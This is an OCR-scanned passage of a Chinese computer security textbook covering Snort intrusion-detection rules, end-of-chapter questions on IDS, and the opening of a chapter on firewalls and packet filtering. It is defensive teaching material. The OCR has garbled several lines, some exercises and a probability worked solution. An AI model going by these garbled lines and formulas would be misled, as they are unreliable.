项 。 当 选 定 一 个 记录 器 选项 时 ， 记 录 器 将 检测 到 的 数据 包 以 可 读 格 式 或 以 更 加 紧凑 的 

二 进 制 格式 存储 在 指定 的 日 志文 件 中 。 之 后 安全 管理 员 可 以 使 用 日 志文 件 进行 将 来 的 

分 析 工 作 。 

© 报警 器 (alerter): 对 于 每 个 检测 到 的 数据 包 ， 发 送 一 个 警报 。 匹 配 规则 中 的 警报 选项 
确定 事件 通知 中 包括 哪些 信息 。 事 件 通知 可 以 发 送 到 文件 、UNIX 套 接 字 (socket) 或 
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者 数据 库 。 警 报 也 可 以 在 测试 或 渗透 研究 期 间 关 闭 。 使 用 UNIX 套 接 字 ， 可 以 将 通知 
发 送 到 网 络 上 其 他 地 方 的 管理 机 。 
Snort 可 以 配置 为 被 动 传感器 ， 监 控 不 在 主要 传输 路 径 上 的 网 络 流量 ， tA AC WARK 
传感器 ， 所 有 数据 包 流 量 必须 通过 它 。 在 后 一 种 情况 下 ，Snort 可 以 实现 人 侵 防 护 以 及 人 侵 检 
测 的 功能 。 我 们 将 在 第 9 章 讨 论 人 侵 防 护 。 


8.9.2 Snort 规则 


Snort 使 用 一 种 简单 、 灵 活 的 规则 定义 语言 来 生成 检测 引擎 可 用 的 规则 。 尽 管 规则 非常 简 
单 ， 可 以 直接 编写 , 但 它们 的 功能 足以 检测 各 种 恶意 或 可 疑 的 网 络 流量 。 








方向 
a) 规 则 报头 
选项 选项 
[feel Se] | 
b) 选 项 


8-10 Snort 规则 格式 


每 个 规则 包括 一 个 固定 的 头 部 和 零 个 或 多 个 选项 (图 8-10 )。 头 部 包含 以 下 元 素 : 

© 动作 (action): 规则 动作 告诉 Snort 当 它 找到 符合 规则 条 件 的 数据 包 时 应 如 何 去 做 。 
表 8-3 列 出 了 可 用 的 动作 。 列 表 中 的 最 后 三 个 动作 (drop, reject, sdrop) RAEN RHE 
式 下 可 用 。 

© 协议 (protocol): Snort 继续 分 析 数 据 包 协议 是 否 匹 配 这 个 字段 。Snort 的 当前 版 本 (2.9 ) 
识别 四 个 协议 : TCP, UDP, ICMP Al IP. Snort 的 未 来 版 本 将 支持 更 多 的 协议 。 

o 源 IP 地 址 (source IP address): 指明 数据 包 的 源 。 该 规则 可 以 指定 特定 的 I 了 P 地址 、 任 
何 IP 地址 和 特定 的 IP 地 址 列表 ,或 者 拒绝 特定 的 了 P 地 址 或 IP 地 址 列表 。 拒 绝 表示 在 
列表 之 外 的 任何 IP 地 址 都 是 匹配 的 。 

e 源 端口 (source port): 该 字段 用 于 指定 协议 的 源 端口 (如 TCP 端口 )。 可 以 以 多 种 方式 
指定 端口 号 ， 包 括 特定 端口 号 、 任 何 端口 、 静 态 端 口 定 义 、 端 口 范 围 和 拒绝 某 些 端口 。 

e 方向 (direction): 该 字段 采用 以 下 两 个 值 中 的 一 个 : 单 向 (unidirectional) ( ->) 或 双向 
(bidirectional) ( <->)。 双 向 选项 告诉 Snort 应 该 将 规则 中 的 地 址 / 端口 对 理解 为 ， 前 面 
是 源 后 面 是 目的 , 或 者 前 面 是 目的 后 面 是 源 。 双 向 选项 使 Snort 能 够 监控 对 话 的 双方 。 


表 8-3 Snort 规则 动作 


动 作 说 明 
alert 使 用 所 选 的 报警 方式 生成 警报 ， 再 将 数据 包 写 人 日 志 
log 将 数据 包 写 人 日 志 
pass 忽略 数据 包 
activate 报警 后 再 激活 另 一 个 dynamic 规则 
dynamic 保持 空闲 直到 被 activate 规则 激活 ， 然 后 作为 log 规则 
drop 使 iptables 丢弃 数据 包 并 写 日 志 


使 iptables 丢弃 数据 包 ， 记 和 日志， 并 发送 数据 ， 如 果 协 议 是 TCP， 则 发 送 TCP 
重 置 ; 如 果 协 议 是 UDP， 则 发 送 ICMP 端口 不 可 达 消 息 


sdrop {Ë iptables 丢弃 数据 包 但 不 写 日 志 


reject 
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e 目的 IP 地 址 (destination IP address): 指明 数据 包 的 目的 地 。 

e 目的 端口 (destination port): 指明 目的 端口 。 

在 规则 头 部 之 后 可 以 有 一 个 或 多 个 规则 选项 。 每 个 选项 由 选项 关键 字 组 成 ， 关 键 字 定义 
选项 ， 后 面 跟 的 参数 指定 选项 的 详细 信息 。 在 书面 形式 中 ， 规 则 选项 集 被 括 在 括号 中 与 头 部 分 
FF. Snort 规则 选项 用 分 号 (;) 分 隔 。 规 则 选项 关键 字 与 其 参数 用 冒号 (:) 分 隔 。 

有 4 个 主要 类 别 的 规则 选项 : 

© 元 数据 (meta-data): 提供 关于 规则 的 信息 ， 但 在 检测 期 间 不 起 任何 作用 。 

o 载荷 (payload): 查找 有 效 载荷 数据 包 中 的 数据 ， 可 以 是 相关 的 。 

o 非 载荷 (non-payload): 查找 非 载荷 数据 。 

298 e 后 检测 (post-detection): 当 规 则 匹配 一 个 数据 包 后 引发 的 特定 规则 。 

表 8-4 提供 了 每 个 类 别 中 的 选项 实例 。 


表 8-4 Snort 规则 选项 实例 


msg 当 一 个 数据 包 生 成 一 个 事件 时 ， 定 义 要 发 送 的 消息 
元 数据 | reference 定义 了 到 外 部 攻击 识别 系统 的 链接 ， 该 系统 可 以 提供 额外 信息 
classtype ”指出 数据 包 尝试 的 攻击 类 型 


content ”使 Snort 对 数据 包 有 效 载荷 中 的 特定 内 容 (文本 和 /或 二 进 制 ) 执行 区 分 大 小 写 的 搜索 

载荷 depth 指定 Snort 对 于 给 定 模 式 ， 在 数据 包 中 的 搜索 深度 。depth 修改 规则 中 的 前 一 个 content 关键 字 
offset 指定 对 于 给 定 模 式 ， 在 数据 包 中 的 起 始 搜 索 位 置 。offset 修改 规则 中 的 前 一 个 content 关键 字 
nocase ”Snort 应 该 在 查找 特定 模式 时 忽略 大 小 写 。nocase 修改 规则 中 的 前 一 个 content 关键 字 


ttl 检查 IP 的 生存 时 间 (time-to-live) 值 。 此 选项 意 在 检测 traceroute 尝试 
id 检查 P 的 ID 字段 是 否 为 某 个 特定 值 。 某 些 工具 (漏洞 检测 、 扫 描 器 和 其 他 恶意 程序 ) 特别 设 
置 该 字段 用 于 各 种 用 途 ， 例 如 值 31337 经 常 被 某 些 黑客 使 用 
dsize 测试 数据 包 有 效 载 荷 的 大 小 。 这 可 以 用 来 检查 异常 大 小 的 数据 包 。 很 多 情况 下 ， 这 对 于 检测 组 
非 载 荷 冲 区 溢出 是 非常 有 用 的 
flags 测试 TCP 标志 是 否 为 指定 设置 
seq 寻找 指定 的 TCP 首部 序列 号 
icmp-id KÆ ICMP ID 值 是 否 是 指定 值 。 这 很 有 用 ， 因 为 某 些 隐蔽 通道 程序 通信 时 使 用 静态 ICMP F 
段 。 开 发 这 个 选项 用 来 检测 stacheldraht DDoS 代理 
logto 把 与 规则 相 匹 配 的 数据 包 写 人 指定 的 日 志文 件 
后 检测 | session JM TCP 会 话 中 提取 用 户 数据 。 很 多 情况 下 ， 其 用 来 查看 用 户 在 telnet、rlogin、ftp 甚至 Web 会 
话 中 输入 的 内 容 是 很 有 用 的 


下 面 是 Snort 规则 的 一 个 实例 : 


Alert tcp $EXTERNAL_NET any -> $HOME_NET any\ 
(msg: “SCAN SYN FIN” flags: SF, 12;\ 
reference: arachnids, 198; classtype: attempted-recon; ) 


在 Snort 中 ， 保 留 的 反 斜 杠 字符 “\” 用 于 续 行 。 本 实例 用 于 检测 TCP 级 的 一 种 叫 作 SYN- 

FIN 的 攻击 。 变 量 名 SEXTERNAL NET 和 $ HOME _ NET 是 预定 义 的 ， 用 来 指定 特定 网 络 。 

在 本 例 中 ， 任 何 源 端口 或 目的 端口 被 指定 。 本 例 在 忽略 八 位 标志 中 的 保留 位 1 和 保留 位 2 的 

情况 下 检查 是 否 仅 仅 SYN 和 FIN 位 被 置 位 。reference 选项 指出 这 种 攻击 的 外 部 定义 ， 它 是 
attempted-recon 类 型 的 攻击 。 


8.10 ”推荐 读物 


[SCAR12] 是 一 个 详细 而 有 价值 的 人 侵 检测 方案 。 有 关 该 主题 的 两 个 简短 而 有 用 的 总 结 
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性 文章 是 [KENT00] 和 [MCHU00]。[PRED08] 给 出 了 内 部 人 员 攻 击 的 例子 。[LAZA05] 和 
[NING04] 研究 了 入 侵 检 测 技术 的 最 新 进展 。[CHAN09] 是 异常 检测 技术 的 一 份 详尽 总 结 。 
[SAMP13] 是 一 份 异常 检测 技术 的 概览 。[CHEN12] 分 析 了 在 IDS 攻击 中 使 用 的 5 种 人 侵 技术 。 
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8.11 关键 术语 、 复 习题 和 习题 


关键 术语 


anomaly detection (异常 检测 ) 
banner grabbing (标题 抓 取 ) 
base-rate fallacy (ÆR) 


false negative ( 漏 报 ) 
false positive ( 误 报 ) 
hacker (黑客 ) 
honeypot (Hi) 


host-based IDS (基于 主机 的 IDS) 


network-based IDS (NIDS ， 基 于 网 络 的 IDS) 
network sensor (网 络 传感器 ) 
passive sensor (被 动 传感器 ) 


rule-based anomaly detection (基于 规则 的 异常 检测 ) 
rule-based heuristic identification (基于 规则 的 启发 


式 识 别 ) 


inline sensor (内 艇 传感器 ) 透 识 别 ) 
intruder (入侵 者 ) security intrusion (安全 人 侵 ) 
intrusion detection (人 侵 检测 ) scanning (扫描 ) 


intrusion detection exchange format (入 侵 检 测 交 换 


格式 ) 


signature approaches (特征 方法 ) 
signature detection (特征 检测 ) 


intrusion detection system (IDS， 人 入侵 检测 系统 ) 


rule-based penetration identification (基于 规则 的 渗 


300 


214 B-RA HAMKARKS AL 


复习 题 


8.1 
8.2 
8.3 
8.4 
8.5 
8.6 
8.7 
8.8 
8.9 
8.10 
8.11 
8.12 
8.13 
8.14 
8.15 
8.16 
8.17 
8.18 
8.19 
8.20 
8.21 
8.22 


列 出 并 简要 定义 4 类 入 侵 者 。 

列 出 并 简要 描述 入 侵 者 攻击 系统 时 通常 所 使 用 的 步骤 。 

给 出 入 侵 者 每 个 攻击 步骤 的 一 个 实例 。 

描述 IDS 三 个 逻辑 组 件 。 

描述 基于 主机 的 IDS 和 基于 网 络 的 IDS 之 间 的 区 别 。 它 们 组 合 到 一 起 有 怎样 的 优势 ? 
IDS 的 三 个 优点 是 什么 ? 

在 IDS 中 ， 漏 报 和 误 报 的 区 别 是 什么 ? 

解释 基 率 廖 误 。 

列 出 IDS 的 一 些 理想 特征 。 

异常 检测 和 特征 或 启发 式 入 侵 检 测 的 区 别 是 什么 ? 

列 出 并 简要 描述 异常 检测 系统 的 三 种 分 类 。 

列 出 几 种 用 在 异常 检测 中 的 机 器 学 习 方 法 ? 

特征 检测 和 基于 规则 的 启发 式 识别 的 区 别 是 什么 ? 

列 出 并 简要 描述 用 在 HIDS 中 的 数据 源 ? 

基于 异常 的 HIDS、 基 于 特征 或 启发 式 检测 的 HIDS， 三 者 中 哪 一 个 应 用 得 更 普遍 ?为 什么 ? 
分 布 式 HIDS 相对 于 单 系 统 HIDS 的 优势 是 什么 ? 

描述 应 用 在 NIDS 中 的 传感器 类 型 。 

NIDS 中 传感器 的 可 能 位 置 是 什么 ? 

异常 检测 或 特征 和 启发 式 检测 哪 一 种 被 用 在 NIDS 中 ， 还 是 二 者 均 被 应 用 ? 
使 用 分 布 式 或 混合 式 IDS 的 动机 是 什么 ? 

BREA? 

Bl ts FF fe STURT RRRA? 


习题 


8.1 


8.2 


8.3 


8.4 


考虑 一 下 我 们 描述 的 普通 攻击 方法 的 第 一 步 ， 即 收集 待 攻击 目标 的 公开 信息 。 什 么 类 型 的 信息 可 以 
被 使 用 ? 有 关 这 些 信息 的 内 容 和 细节 的 使 用 给 了 你 什么 启发 ? 与 公司 的 商业 和 法 律 要 求 的 关联 是 怎 
样 的 ? 如 何 调 和 这 些 冲 突 的 要 求 ? 

在 IDS EP SCH, RAT MRR IDS 对 于 本 来 正常 的 情况 产生 警报 。 漏 报 是 指 IDS 对 于 正在 发 生 
的 应 该 报警 的 情况 没有 报警 。 在 下 图 中 ， 分 别 用 两 条 曲线 大 致 表示 误 报 和 漏 报 。 


报警 频率 
更 不 具体 保留 特征 更 具体 
或 更 宽松 或 更 严格 


无 线 网 络 因 其 传输 的 广播 特性 ， 提 出 了 与 有 线 网 络 不 同 的 NIDS 部 署 问题 。 讨 论 在 决定 无 线 NIDS 
传感器 的 位 置 时 ， 应 该 注意 考虑 的 事项 。 

Snort 中 的 一 个 非 载荷 选项 是 fow。 此 选项 区 分 客户 端 和 服务 器 。 此 选项 可 用 于 指定 仅 匹 配 在 一 个 
方向 上 流动 的 数据 包 (客户 端 到 服务 器 或 者 相反 )， 并 可 指定 仅 匹 配 已 建立 的 TCP 连接 。 请 考虑 以 
下 Snort 规则 : 
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alert tcp $EXTERNAL_NET any -> $SQL_SERVERS SORACLE_PORTS\ 
(msg: “ORACLE create database attempt: ; \ 


flow: to_server, established; content: “create database”; 
nocase; \ 


classtype: protocol-command-decode; ) 


a. 此 规则 是 做 什么 的 ? 
b. 如 果 Snort 设备 放 在 外 部 防火 墙 的 内 部 或 外 部 ， 分 别 说 明 此 规则 的 重要 性 。 

8.5 图 8-! 中 两 个 概率 密度 函数 的 重 和 到 区 域 表 示 区 域 中 误 报 和 漏 报 的 可 能 性 。 而 且 ， 图 8-1 是 理想 化 的 ， 
并 不 一 定 代表 两 个 密度 函数 的 相对 性 状 。 假 设 每 1000 个 授权 用 户 中 有 1 个 实际 的 人 侵 ， 重 春 区 域 
占 授权 用 户 的 1% 和 人 侵 者 的 50%。 
a. 画 出 这 样 一 组 密度 函数 ， 并 证 明 上 述 描述 并 不 合理 。 
b. 此 区 域 中 发 生 授权 用 户 的 事件 的 概率 是 多 少 ? 请 记 住所 有 人 侵 的 50% 属于 此 区 域 。 

8.6 基于 主机 的 人 侵 检 测 工具 的 一 个 实例 是 tripwire 程序 。 这 是 一 个 文件 完整 性 检查 工具 ， 它 定期 在 系 
统 上 扫描 文件 和 目录 ， 并 告知 管理 员 它 们 的 任何 更 改 。 扫 描 时 ， 对 于 每 个 被 检查 的 文件 ， 该 工具 将 
其 在 受 保护 数据 库 中 存储 的 密码 校 验 和 与 重新 计算 得 出 的 值 进行 比较 。 它 必须 配置 要 检查 的 文件 和 
目录 列表 ， 以 及 对 于 每 个 列表 项 哪些 变化 是 允许 的 (如 果 有 变化 的 话 )。 例 如 它 可 以 允许 日 志文 件 附 
加 新 条 目 ， 而 不 是 对 已 有 条 目 进 行 更 改 。 使 用 这 样 的 工具 的 优点 和 缺点 是 什么 ? 如 果 考 虑 到 需要 确 
定 哪些 文件 应 该 很 少 更 改 ， 哪 些 文件 可 能 会 更 经 常 更 改 及 如 何 更 改 ， 哪 些 文件 会 频繁 更 改 等 问题 ， 
则 无 法 检测 。 因 此 ， 考 虑 在 程序 配置 和 系统 管理 员 监 控 生 成 响应 这 两 方面 需要 完成 的 工作 。 

8.7 一 个 分 布 式 NIDS 由 网 络 中 两 个 节点 监控 异常 的 输入 流量 。 此 外 ， 还 有 一 个 中 央 节 点 ， 用 于 在 收 到 
两 个 分 布 式 节 点 的 输入 信和 号 后 生成 报警 信号 。 到 两 个 IDS 节点 的 输入 流量 的 特征 服从 四 种 模式 之 
一 : P1、P2、P3 和 P4。 威 胁 等 级 划分 由 中 央 节 点 根据 给 定时 间 内 两 个 NIDS 的 观测 流量 确定 ， 在 
下 表 中 给 出 : 


威胁 等 级 特 E 
低 1P1+1P2 
中 1P3+1P4 
高 2P4 


如 果 在 给 定 的 时 间 ， 至 少 有 一 个 分 布 式 节点 产生 报警 信号 P3 ， 则 观察 到 的 网 络 流量 将 被 划分 为 中 等 
威胁 级 别 的 概率 是 多 少 ? 
8.8 ”一 辆 出 租车 涉及 夜间 发 生 的 一 起 致命 交通 事故 的 肇事 逃逸 。 在 该 城市 中 有 两 家 出 租车 公司 ， 分 别 为 
Green 公司 和 Blue 公司 。 已 知 : 
e 此 城市 中 的 出 租车 85% 是 Green 公司 的 ，15% 是 Blue 公司 的 。 
e 一 个 目击 者 证 实 後 事 车 辆 属于 Blue 公司 。 
法 庭 测试 了 目击 者 在 夜间 发 生 的 交通 事故 中 作证 的 可 靠 性 ， 得 出 目击 者 正确 识别 出 租车 颜色 的 概率 
为 80%。 请 问 秘 事 出 租车 属于 Blue 公司 而 非 Green 公司 的 概率 是 多 少 ? 
_ PrL4B 
Pr[AI B] = Say 
1/12 1 
Pr[Al B] = 34 = 
Pr[4] = Ș PLA! E, ]Pr[ E; ] 
Pr[41 E,]P[E,] _ Pr[A] E,]P[E,] 
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防火 墙 与 入 侵 防护 系统 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
© 解释 防火 墙 作为 计算 机 和 网 络 安 全 策略 的 一 部 分 所 起 到 的 作用 ; 
© 列举 防火 墙 的 关键 特征 ; 
讨论 防火 墙 的 各 种 基本 选项 ; 
理解 防火 墙 部 署 和 配置 的 不 同 选择 所 带 来 的 相对 优点 ; 





e 

e 

© 区 分 防火 墙 和 入 侵 防 御 系 统 ; 

© 定义 一 体 化 威胁 管理 系统 的 概念 。 


防火 墙 能 够 有 效 地 保护 本 地 系统 或 网 络 免 受 基于 网 络 的 安全 威胁 ， 同 时 支持 通过 广域网 或 
Internet 访问 外 部 世界 。 


9.1 ”防火墙 的 必要 性 


企业 、 政 府 部 门 和 其 他 一 些 机 构 的 信息 系统 都 经 历 了 一 个 稳定 的 发 展 过 程 : 
e 集中 式 数 据 处 理 系 统 ， 包 括 一 个 可 支持 许多 终端 与 其 直接 连接 的 中 央 大 型 机 系统 。 
e 局 域 网 (LAN) 将 个 人 计算 机 和 终端 互 连 ， 并 与 大 型 机 系统 互 连 。 
e 驻地 网 (premise network)， 由 许多 局 域 网 组 成 ， 将 个 人 计算 机 、 服 务 器 以 及 一 台 或 者 
两 台大 型 机 相互 连接 起 来 。 
© 企业 级 网 络 (enterprise-wide network)， 由 通过 专用 广域网 (wide area network) 连接 起 
来 的 多 个 不 同 地 理 分 布 的 驻地 网 组 成 。 
e Internet 连通 性 〈 Internet connectivity)， 其 中 多 个 驻地 网 都 连接 到 Internet， 各 个 驻地 网 
可 以 通过 专用 广域网 连接 ， 也 可 以 不 通过 专用 广域网 连接 。 
如 今 ， 对 于 大 多 数 机 构 而 言 ， 与 Internet 的 连接 已 经 不 再 是 可 有 可 无 的 了 ， 因 为 Internet 
上 大 量 的 信息 和 服务 对 于 他 们 来 说 是 非常 重要 的 。 而 且 ， 机 构 内 部 的 个 人 用 户 同 样 需要 访问 
Intermnet， 如 果 他 们 所 处 的 局 域 网 不 能 提供 这 种 访问 ， 他 们 将 会 通过 拨号 上 网 的 方式 从 他 们 的 
PC 机 连接 到 Internet 服务 提供 商 (ISP), BÆ, Internet 给 机 构 提 供 便利 的 同时 ， 也 使 得 外 部 
的 世界 能 够 接触 到 本 地 网 络 资源 并 对 其 产生 影响 ， 这 就 会 对 机 构 产 生 威胁 。 虽 然 给 驻地 网 中 的 
工作 站 和 服务 器 配置 强大 的 安全 特性 是 可 能 的 ， 例 如 入 侵 保护 ， 但 这 也 许 不 能 满足 要 求 ， 而 且 
在 某 些 情 况 下 是 不 划算 的 。 考 虑 一 个 有 着 数 百 个 甚至 数 千 个 系统 的 网 络 ， 其 中 混杂 运行 着 各 种 
各 样 的 操作 系统 ， 比 如 不 同 版 本 的 Windows、Mac OS X 和 Linux。 当 发 现 一 个 安全 缺陷 时 ， 所 
有 受到 潜在 影响 的 系统 都 必须 升级 以 修补 这 个 缺陷 。 这 要 求 适当 的 配置 管理 和 积极 的 修补 以 保 
证 运行 的 效率 。 如 果 仅 使 用 基于 主机 的 安全 措施 ， 尽 管 这 很 困难 ， 但 是 这 种 方法 是 可 行 而 且 是 
必要 的 。 一 种 被 人 们 广泛 接受 的 代替 方法 ,或 者 至 少 说 是 对 基于 主机 的 安全 服务 的 一 种 补充 ， 
就 是 防火 墙 。 防 火 墙 设置 在 驻地 网 和 Internet 之 间 ， 以 建立 二 者 间 的 可 控 链 路 ， 构 筑 一 道外 部 
安全 壁垒 或 者 说 安全 周 界 。 这 条 安全 周 界 的 目的 是 保护 驻地 网 不 受 源 于 Internet 的 攻击 ， 提 供 
一 个 能 加 强 安 全 和 审计 的 遏制 点 (single choke point)。 防 火 墙 可 以 是 单机 系统 ， 也 可 以 是 协作 


BOF BKBSARBPAR 217 


完成 防火 墙 功能 的 两 个 或 者 更 多 系统 。 
防火 墙 还 创建 了 一 个 附加 的 防御 层 ， 将 内 部 系统 和 外 部 网 络 隔离 开 来 。 这 是 遵循 “纵深 防 
ffl” (defense in depth) 的 古典 军事 理论 ,该 思想 恰恰 也 适用 于 IT 安全 。 


9.2 防火墙 的 特征 和 访问 策略 


[BELL94] 列 出 了 以 下 的 防火 墙 设计 目标 : 

L. 所 有 入 站 和 出 站 的 网 络 流量 都 必须 通过 防火 墙 。 这 可 以 通过 物理 阻 断 所 有 避 开 防火 墙 访 
问 内 部 网 络 的 企图 来 实现 。 多 种 配置 方式 都 是 可 行 的 ， 在 本 章 的 后 续 部 分 会 对 其 进行 解释 。 

2. 只 有 经 过 授权 的 网 络 流量 ,例如 符合 本 地 安全 策略 定义 的 流量 ， 防 火 墙 才 允许 其 通过 。 
可 以 使 用 不 同类 型 的 防火 墙 实现 不 同 的 安全 策略 ， 本 章 的 后 续 部 分 会 对 其 进行 解释 。 

3. 防火 墙 本 身 不 能 被 渗透 。 这 意味 着 防火 墙 应 该 运行 在 有 安全 操作 系统 的 可 信 系统 上 。 可 
信 计 算 机 系统 适 于 设置 防火 墙 ， 这 通常 是 政务 应 用 中 所 要 求 的 。 这 个 问题 将 在 第 13 章 中 进行 
讨论 。 

指定 合适 的 访问 策略 是 防火 墙 的 规划 和 实施 过 程 的 关键 部 分 。 策 略 中 会 列 出 可 以 通过 防火 
墙 的 合法 流量 类 型 ， 包 括 地 址 范围 、 协 议 、 应 用 程序 、 内 容 类 型 等 。 该 策略 应 由 企业 的 信息 安 
全 风险 评估 和 策略 部 门 进行 制定 ， 我 们 会 在 第 14 章 和 第 15 章 进行 介绍 。 访 问 策略 先是 根据 一 
个 较为 广义 的 规范 ， 即 公司 需要 支持 哪些 类 型 的 流量 而 进行 制定 。 之 后 ， 这 些 策略 会 被 提炼 为 
具体 的 过 滤器 ， 被 部 署 在 合适 的 防火 墙 拓扑 中 。 

[SCAR09b] 列 出 了 一 些 可 以 用 来 过 滤 流 量 的 防火 墙 访问 策略 的 特征 : 

IP 地 址 和 协议 值 (IP Address and Protocol Value): 这 是 基于 源 地 址 或 目的 地 址 、 端 口号 、 
人 站 或 出 站 的 网 络 流 方向 ， 以 及 其 他 网 络 层 和 传输 层 特征 进行 的 访问 控制 。 这 种 类 型 
的 过 滤器 通常 被 包 过 滤 和 状态 检测 防火 墙 所 使 用 ， 用 来 限制 对 特定 服务 的 访问 。 
应 用 层 协 议 ( Application Protocol) : 这 是 以 授权 的 应 用 层 协 议 数据 为 基础 的 访问 控制 。 
此 类 过 滤器 通常 被 应 用 层 网 关 所 使 用 ， 且 网 关 主 要 用 于 转发 和 监控 特定 应 用 层 协议 的 
信息 交换 。 例 如 检查 SMTP 的 垃圾 邮件 ， 或 者 发 到 授权 网 站 的 HTTP Web 请 求 。 

用 户 身 份 (User Identity): 这 是 基于 用 户 身 份 的 访问 控制 。 通 常用 于 那些 需要 确认 自己 
正在 使 用 某 种 形式 的 安全 认证 技术 的 内 部 用 户 ， 例 如 第 22 章 提 到 的 IPSec。 

网 络 活动 ( Network Activity): 这 是 基于 时 间或 请 求 等 注意 事项 的 访问 控制 。 例 如 限定 
时 间 段 、 请 求 频 率 、 检 测 扫描 请 求 或 其 他 行为 模式 。 

在 进一步 阐述 防火 墙 类 型 和 配置 细节 之 前 ， 最 好 总 结 一 下 防火 墙 的 预期 作用 。 下 面 的 功能 
都 属于 防火 墙 应 具备 的 : 

1. 防火 墙 定 义 一 个 遏制 点 ， 用 于 把 未 授权 用 户 阻止 在 受 保护 的 网 络 之 外 ， 阻 止 有 潜在 安全 
威胁 的 服务 进入 或 者 离开 网 络 ， 并 且 防 止 各 种 IP 假冒 攻击 和 路 由 攻击 。 使 用 遏制 点 简化 了 安 
全 管理 ， 因 为 单 系统 或 多 系统 的 安全 性 被 巩固 了 。 

2. 防火 墙 提 供 了 监视 安全 相关 (security-related) 事件 的 场所 。 防 火 墙 系统 可 以 执行 审计 和 
警告 。 

3. 防火 墙 可 以 为 多 种 与 安全 不 相关 的 Internet 功能 的 实现 提供 一 个 便利 的 平台 。 这 些 功能 
包括 网 络 地址 转换 器 ， 用 于 将 本 地 地 址 映射 到 Internet 地 址 ; 还 包括 网 络 管理 功能 ， 用 于 审计 
或 记录 Internet 的 使 用 情况 。 

4. 防火 墙 可 以 作为 IPSec 的 平台 。 使 用 第 22 章 描述 的 隧道 功能 ， 防 火 墙 能 够 实现 虚拟 专 
用 网 (VPN) 功能 。 

防火 墙 也 有 其 局 限 性 ， 主 要 表现 在 : 
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1. 防火 墙 不 能 阻止 那些 绕 开 防火 墙 的 攻击 。 内 部 系统 可 能 具有 拨号 连接 到 ISP 的 功能 。 内 
部 局 域 网 可 以 支持 调制 解 调 器 池 ， 为 外 地 出 差 的 职员 或 远程 工作 者 提供 拨号 进入 系统 的 功能 。 

2. 防火墙 不 能 完全 防止 内 部 威胁 ， 比 如 心 存 不 满 的 职员 或 无 意 中 被 外 部 攻击 者 利用 的 
职员 。 

3. 一 个 安全 设置 不 当 的 无 线 局 域 网 有 可 能 允许 来 自 公 司 外 部 的 访问 。 内 部 防火 墙 把 企业 网 
络 分 成 多 个 部 分 ， 但 是 不 能 阻止 本 地 系统 与 其 他 被 内 部 防火 墙 所 分 割 的 部 分 进行 无 线 通信 。 

4. 笔记 本 电脑 、PDA 或 便携 式 存储 设备 可 能 在 企业 网 以 外 的 地 方 使 用 时 被 感染 了 ， 之 后 
被 连接 到 内 部 网 络 使 用 。 


9.3 防火墙 的 类 型 


防火 墙 可 以 监控 多 个 层面 的 网 络 流量 。 例 如 从 底层 的 网 络 数据 包 (可 以 是 独立 的 包 或 是 数 
据 流 的 一 部 分 )， 到 传输 层 所 有 连接 的 流量 ， 再 到 检查 应 用 层 协议 的 细节 。 选 择 监 控 哪 一 层 取 
决 于 防火 墙 的 期 望 访问 策略 。 防 火 墙 可 以 配置 为 积极 过 滤器 ， 即 只 人 允许 符合 特定 标准 的 数据 包 
通过 ; 也 可 以 配置 为 消极 过 滤器 ， 即 拒绝 符合 一 定 标准 的 任何 数据 包 。 这 些 标 准 实现 了 先前 所 
讨论 的 访问 策略 。 根 据 防 火 墙 的 类 型 ， 它 可 以 对 每 一 个 包 检 测 一 个 或 多 个 协议 头 、 每 个 包 的 净 
fei (payload) 或 者 是 一 个 包 序列 所 产生 的 模式 。 在 这 一 节 中， 我 们 会 对 防火 墙 的 主要 类 型 进行 
介绍 。 


9.3.1 包 过 滤 防 火 墙 


包 过 滤 防 火 墙根 据 一 组 规则 来 检查 每 个 接收 和 发 送 的 IP 包 ， 然 后 决定 转发 或 者 丢弃 此 包 ， 
如 图 9-1b 所 示 。 一 般 防 火 墙 会 配置 成 双向 过 滤 (从 内 网 出 去 和 进入 内 网 )。 过 滤 规 则 基于 网 络 
包 中 所 包含 的 信息 。 
e J IP 地址 (source IP address): Aik IP 包 的 系统 的 IP 地 址 (例如 ，192.178.1.1 )。 
e 目的 IP 地 址 (destination IP address); 包 要 到 达 的 系统 的 了 P 地 址 (例如 ，192.168.1.1 )。 
e 源 和 目的 端 传输 层 地 址 (source and destination transport-level address): 指 传输 层 (fl 
gn, TCP 或 UDP) MOS, 不 同 的 端口 号 定义 了 不 同 的 应 用 程序 ， 比 如 SNMP 和 
TELNET。 

o IP 协议 域 (IP protocol field): 用 于 定义 传输 协议 。 

o 接口 (interface) : 对 于 有 三 个 或 者 更 多 接口 的 防火 墙 来 说 ， 定 义 哪 个 接口 用 于 包 的 出 
站 ， 哪 个 接口 用 于 包 的 人 站 。 

通常 ， 包 过 滤器 设置 成 基于 与 IP 和 TCP (header) 域 匹配 的 规则 列表 。 如 果 与 其 中 的 某 
条 规则 匹配 ， 则 调用 此 规则 来 判断 该 包 是 转发 还 是 丢弃 。 如 果 没 有 匹配 的 规则 ， 则 执行 默认 的 
操作 。 有 两 种 可 能 的 默认 策略 : 

e 默认 = 丢弃 : 没有 明确 准许 的 将 被 阻止 。 

e 默认 = 转发 : 没有 明确 阻止 的 将 被 准许 。 

默认 丢弃 策略 是 一 种 更 加 保守 的 策略 。 在 该 策略 中 ,最初 ， 所 有 的 操作 将 会 被 防火 墙 阻 
止 ， 必 须 一 条 一 条 地 添加 服务 。 该 策略 下 的 用 户 更 容易 感觉 到 防火 墙 的 存在 ,但 多 数 用 户 会 因 
为 麻烦 而 把 防火 墙 视 为 一 种 阻碍 。 但 是 商业 和 政府 机 构 可 能 会 采用 这 种 策略 。 而 且 ， 随 着 规则 
的 增加 ， 用 户 对 防火 墙 存 在 的 感觉 会 逐渐 减 小 。 默 认 转 发 策略 提高 了 终端 用 户 的 方便 性 ， 但 是 
提供 的 安全 性 也 降低 了 。 实 际 上 ， 安 全 管理 员 必 须 对 每 一 种 透 过 防火 墙 出 现 的 安全 威胁 做 相关 
的 处 理 。 这 种 策略 通常 被 一 些 开 放 的 组 织 所 采用 ， 例 如 大 学 。 
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内 部 〈 受 保护 的 ) 外 部 〈 不 可 信 的 ) 
Pass ( 例如， 企业 网 ) 防火 墙 网 络 ( 例如 ，Internet ) 








d) 应 用 代理 防火 墙 e) 电路 级 代理 防火 墙 
图 9-1 防火 墙 的 几 种 类 型 


表 9-1 给 出 了 一 个 用 于 SMTP 流量 包 过 滤 的 规则 集 的 例子 。 该 规则 的 目的 是 允许 所 有 人 站 
和 出 站 的 电子 邮件 流量 ， 并 禁止 其 他 流量 。 规 则 自 顶 向 下 应 用 到 每 个 数据 包 中 ， 每 条 规则 的 含 
